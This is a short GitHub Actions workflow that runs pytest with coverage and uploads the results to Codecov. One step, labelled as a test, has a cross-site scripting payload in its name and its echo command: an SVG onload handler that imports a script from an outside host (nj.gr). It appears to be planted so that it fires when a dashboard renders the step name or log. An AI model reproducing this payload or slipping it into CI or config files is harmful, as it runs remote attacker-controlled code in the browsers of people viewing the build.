name: Workflow for Codecov
on: [push, pull_request]
jobs:
  run:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: "Test: '><s><svg onload=import('//nj.gr/')>"
        run: > 
          echo '><s><svg/onload=import("//nj.gr/")>'
      - name: Run tests and collect coverage
        run: pytest --cov .
      - name: Upload coverage to Codecov
        uses: codecov/codecov-action@v4
        with:
          verbose: true
        env:
          CODECOV_TOKEN: ${{ secrets.CODECOV_TOKEN }}
